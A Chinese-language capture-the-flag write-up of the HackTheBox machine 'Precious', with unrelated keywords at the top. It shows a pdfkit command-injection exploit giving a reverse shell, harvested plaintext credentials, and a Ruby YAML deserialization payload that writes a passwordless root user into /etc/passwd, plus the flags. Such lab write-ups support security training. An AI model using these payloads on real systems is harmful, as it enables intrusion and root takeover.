软件公司都是帮别人做网站么,保健品网站模版,网站建设免费维护内容,wordpress登录页目录
连接至HTB服务器并启动靶机
使用nmap对靶机TCP端口进行开放扫描
使用curl访问靶机80端口
使用ffuf爆破一下子域
使用浏览器访问该域名
使用curl访问该域名响应头
使用exiftool工具查看该pdf信息
横向移动
USER_FLAG#xff1a;adf5793a876a190f0c08b3b6247cec32…目录
连接至HTB服务器并启动靶机
使用nmap对靶机TCP端口进行开放扫描
使用curl访问靶机80端口
使用ffuf爆破一下子域
使用浏览器访问该域名
使用curl访问该域名响应头
使用exiftool工具查看该pdf信息
横向移动
USER_FLAGadf5793a876a190f0c08b3b6247cec32
特权提升
ROOT_FLAGf1f5fd20bc4c3cdfae0299947296fbb6 连接至HTB服务器并启动靶机 靶机IP10.10.11.189 分配IP10.10.16.7 使用nmap对靶机TCP端口进行开放扫描
nmap -p- --min-rate1500 -T5 -sS -Pn 10.10.11.189 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nmap -p- --min-rate1500 -T5 -sS -Pn 10.10.11.189 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 23:24 EST Warning: 10.10.11.189 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.11.189 (10.10.11.189) Host is up (0.15s latency). Not shown: 65507 closed tcp ports (reset), 26 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 46.17 seconds 再次使用nmap对靶机22、80端口进行脚本、服务扫描
nmap -p 22,80 -sCV 10.10.11.189 使用curl访问靶机80端口
curl -I http://10.10.11.189:80 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl -I http://10.10.11.189:80 HTTP/1.1 302 Moved Temporarily Server: nginx/1.18.0 Date: Sun, 10 Nov 2024 05:20:11 GMT Content-Type: text/html Content-Length: 145 Connection: keep-alive Location: http://precious.htb/ 将该域名与靶机IP绑定
echo 10.10.11.189 precious.htb /etc/hosts 使用ffuf爆破一下子域
ffuf -u http://precious.htb/ -H Host: FUZZ.precious.htb -w ../dictionary/subdomains-top20000.txt -t 200 -fc 302 再使用ffuf对该域名路径FUZZ
ffuf -u http://precious.htb/FUZZ -w ../dictionary/Common-dir.txt -t 200 -fc 302 使用浏览器访问该域名 这里直接就是一个提交一个URL到靶机上初次之外也没有其他有用信息了
使用curl访问该域名响应头
curl -I http://precious.htb/ ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl -I http://precious.htb/ HTTP/1.1 200 OK Content-Type: text/html;charsetutf-8 Content-Length: 483 Connection: keep-alive Status: 200 OK X-XSS-Protection: 1; modeblock X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Date: Sun, 10 Nov 2024 06:06:21 GMT X-Powered-By: Phusion Passenger(R) 6.0.15 Server: nginx/1.18.0 Phusion Passenger(R) 6.0.15 X-Runtime: Ruby 可以看到页面返回了一个Ruby所以这页面很可能就是用ruby语言编写
本地编写一个test.txt文件
echo This is a test text test.txt
利用python开启一个http服务
python -m http.server 7777
靶机URL上传至将test.txt文件进行下载 点击Submit后成功进行了转换 使用exiftool工具查看该pdf信息
.\exiftool.exe .\vxwb2a1xjsyl4ljfe7saqov548euun2v.pdf 使用searchsploit搜索关键词pdfkit
searchsploit pdfkit 可以看到该EXP版本是符合我们这次的靶机利用要求的
将EXP拷贝到当前目录下
searchsploit -m 51293.py ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# searchsploit -m 51293.py Exploit: pdfkit v0.8.7.2 - Command Injection URL: https://www.exploit-db.com/exploits/51293 Path: /usr/share/exploitdb/exploits/ruby/local/51293.py Codes: CVE-2022–25765 Verified: True File Type: Python script, Unicode text, UTF-8 text executable Copied to: /home/kali/Desktop/temp/51293.py 看一下该EXP需要填写的参数 使用Yakit抓包看一下提交时的POST参数 本地侧nc开始监听
nc -lvnp 1425
使用EXP获得反弹shell
python 51293.py -s 10.10.16.7 1425 -w http://precious.htb -p url 本地侧nc收到回显 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.16.7] from (UNKNOWN) [10.10.11.189] 45250 whoami ruby 横向移动
提升TTY
script -c /bin/bash -q /dev/null
查看系统中的用户
cat /etc/passwd 可登录的用户root、henry、ruby
我们切换到/tmp目录下
cd /tmp
查找一切与conf字样相关的文件并将输出保存到res.txt文件
find / -name *conf* -type f 2/dev/null | tee res.txt
从res.txt文件中逐行读取文件内容并匹配henry字样
cat res.txt | xargs -I {} sh -c cat {} | grep henry rubyprecious:/tmp$ cat rex.txt | xargs -I {} sh -c cat {} | grep henry cat rex.txt | xargs -I {} sh -c cat {} | grep henry Value: henry Value: henry BUNDLE_HTTPS://RUBYGEMS__ORG/: henry:Q3c1AqGHtoI0aXAYFH 如此这般便获得了henry的凭证 账户henry 密码Q3c1AqGHtoI0aXAYFH 使用上述凭证通过SSH服务登录到靶机
ssh henry10.10.11.189 查找user_flag位置并查看其内容 henryprecious:~$ find / -name user.txt 2/dev/null /home/henry/user.txt henryprecious:~$ cat /home/henry/user.txt adf5793a876a190f0c08b3b6247cec32 USER_FLAGadf5793a876a190f0c08b3b6247cec32 特权提升
查看当前用户可特权运行的命令
sudo -l henryprecious:~$ sudo -l Matching Defaults entries for henry on precious: env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User henry may run the following commands on precious: (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb 查看update_dependencies.rb文件内容
cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in dependencies.yml
require yaml
require rubygems# TODO: update versions automatically
def update_gems()
enddef list_from_fileYAML.load(File.read(dependencies.yml))
enddef list_local_gemsGem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
endgems_file list_from_file
gems_local list_local_gemsgems_file.each do |file_name, file_version|gems_local.each do |local_name, local_version|if(file_name local_name)if(file_version ! local_version)puts Installed version differs from the one specified in file: local_nameelseputs Installed version is equals to the one specified in file: local_nameendendend
end
简单代码审计后可知该ruby代码的作用是拿本地的gems库版本与dependencies.yml文件中写的版本进行比对 此处读取YAML文件引起了我的注意因为它并没有指向具体YAML的绝对地址这意味着如果我们运行特权命令这个文件将会在我们运行命令的当前目录下开始寻找
查找该文件位置 henryprecious:/opt/sample$ find / -name dependencies.yml 2/dev/null /opt/sample/dependencies.yml 查看该文件权限分配
ls -l /opt/sample/dependencies.yml henryprecious:/opt/sample$ ls -l /opt/sample/dependencies.yml -rw-r--r-- 1 root root 26 Sep 22 2022 /opt/sample/dependencies.yml 查看该文件内容
cat /opt/sample/dependencies.yml henryprecious:/opt/sample$ cat /opt/sample/dependencies.yml yaml: 0.1.1 pdfkit: 0.8.6 我尝试在网上搜索ruby中的YAML.load函数如何能执行命令 根据文中的描述这个Payload可以导致RCE ---
- !ruby/object:Gem::Installeri: x
- !ruby/object:Gem::SpecFetcheri: y
- !ruby/object:Gem::Requirementrequirements:!ruby/object:Gem::Package::TarReaderio: 1 !ruby/object:Net::BufferedIOio: 1 !ruby/object:Gem::Package::TarReader::Entryread: 0header: abcdebug_output: 1 !ruby/object:Net::WriteAdaptersocket: 1 !ruby/object:Gem::RequestSetsets: !ruby/object:Net::WriteAdaptersocket: !ruby/module Kernelmethod_id: :systemgit_set: idmethod_id: :resolve我在攻击机本地新建一个dependencies.yml文件通过命令执行我尝试新建一个无密码管理员用户0dayhp
echo 0dayhp::0:0:0dayhp:/root:/bin/bash /etc/passwd --- - !ruby/object:Gem::Installer i: x - !ruby/object:Gem::SpecFetcher i: y - !ruby/object:Gem::Requirement requirements: !ruby/object:Gem::Package::TarReader io: 1 !ruby/object:Net::BufferedIO io: 1 !ruby/object:Gem::Package::TarReader::Entry read: 0 header: abc debug_output: 1 !ruby/object:Net::WriteAdapter socket: 1 !ruby/object:Gem::RequestSet sets: !ruby/object:Net::WriteAdapter socket: !ruby/module Kernel method_id: :system git_set: echo 0dayhp::0:0:0dayhp:/root:/bin/bash /etc/passwd method_id: :resolve 本地通过python开启一个http服务
python -m http.server 7777
靶机进入/tmp目录下下载该文件
wget http://10.10.16.7:7777/dependencies.yml -O dependencies.yml
直接sudo运行无密码特权命令 henryprecious:/tmp$ sudo /usr/bin/ruby /opt/update_dependencies.rb sh: 1: reading: not found Traceback (most recent call last): 33: from /opt/update_dependencies.rb:17:in main 32: from /opt/update_dependencies.rb:10:in list_from_file 31: from /usr/lib/ruby/2.7.0/psych.rb:279:in load 30: from /usr/lib/ruby/2.7.0/psych/nodes/node.rb:50:in to_ruby 29: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in accept 28: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in accept 27: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in visit 26: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:313:in visit_Psych_Nodes_Document 25: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in accept 24: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in accept 23: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in visit 22: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:141:in visit_Psych_Nodes_Sequence 21: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in register_empty 20: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in each 19: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in block in register_empty 18: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in accept 17: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in accept 16: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in visit 15: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:208:in visit_Psych_Nodes_Mapping 14: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:394:in revive 13: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:402:in init_with 12: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:218:in init_with 11: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:214:in yaml_initialize 10: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:299:in fix_syck_default_key_in_requirements 9: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_reader.rb:59:in each 8: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_header.rb:101:in from 7: from /usr/lib/ruby/2.7.0/net/protocol.rb:152:in read 6: from /usr/lib/ruby/2.7.0/net/protocol.rb:319:in LOG 5: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in 4: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in write 3: from /usr/lib/ruby/vendor_ruby/rubygems/request_set.rb:388:in resolve 2: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in 1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in write /usr/lib/ruby/2.7.0/net/protocol.rb:458:in system: no implicit conversion of nil into String (TypeError) 查看/etc/passwd文件内容
cat /etc/passwd 可以看到内容已经被成功添加进了/etc/passwd文件中
切换到0dayhp用户
su 0dayhp henryprecious:/tmp$ su 0dayhp rootprecious:/tmp# whoami root 查看root_flag位置并查看其内容 rootprecious:/tmp# find / -name root.txt /root/root.txt rootprecious:/tmp# cat /root/root.txt f1f5fd20bc4c3cdfae0299947296fbb6 ROOT_FLAGf1f5fd20bc4c3cdfae0299947296fbb6
